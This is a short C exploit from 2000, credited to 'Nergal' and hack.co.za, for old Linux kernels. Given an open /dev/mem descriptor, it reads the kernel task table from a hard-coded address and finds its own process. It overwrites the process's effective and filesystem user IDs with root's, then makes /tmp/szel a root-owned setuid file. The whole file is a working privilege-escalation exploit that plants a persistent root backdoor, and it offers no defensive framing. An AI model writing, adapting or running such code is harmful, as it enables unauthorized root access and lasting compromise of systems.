/* by Nergal */
#define SEEK_SET 0

#define __KERNEL__
#include <linux/sched.h>
#undef __KERNEL__

#define SIZEOF sizeof(struct task_struct)

int mem_fd;
int mypid;

void
testtask (unsigned int mem_offset)
{
  struct task_struct some_task;
  int uid, pid;
  lseek (mem_fd, mem_offset, SEEK_SET);
  read (mem_fd, &some_task, SIZEOF);
  if (some_task.pid == mypid)   /* is it our task_struct ? */
    {
      some_task.euid = 0;
      some_task.fsuid = 0;      /* needed for chown */
      lseek (mem_fd, mem_offset, SEEK_SET);
      write (mem_fd, &some_task, SIZEOF);
      /* from now on, there is no law beyond do what thou wilt */
      chown ("/tmp/szel", 0, 0);
      chmod ("/tmp/szel", 04755);
      exit (0);
    }
}

#define KSTAT 0x001ca90c
main ()
{
  unsigned int i;
  struct task_struct *task[NR_TASKS];
  unsigned int task_addr = KSTAT - NR_TASKS * 4;
  mem_fd = 3;                   /* presumed to be opened /dev/mem */
  mypid = getpid ();
  lseek (mem_fd, task_addr, SEEK_SET);
  read (mem_fd, task, NR_TASKS * 4);
  for (i = 0; i < NR_TASKS; i++)
    if (task[i])
      testtask ((unsigned int)(task[i]));
}
/*                    www.hack.co.za              [2000]*/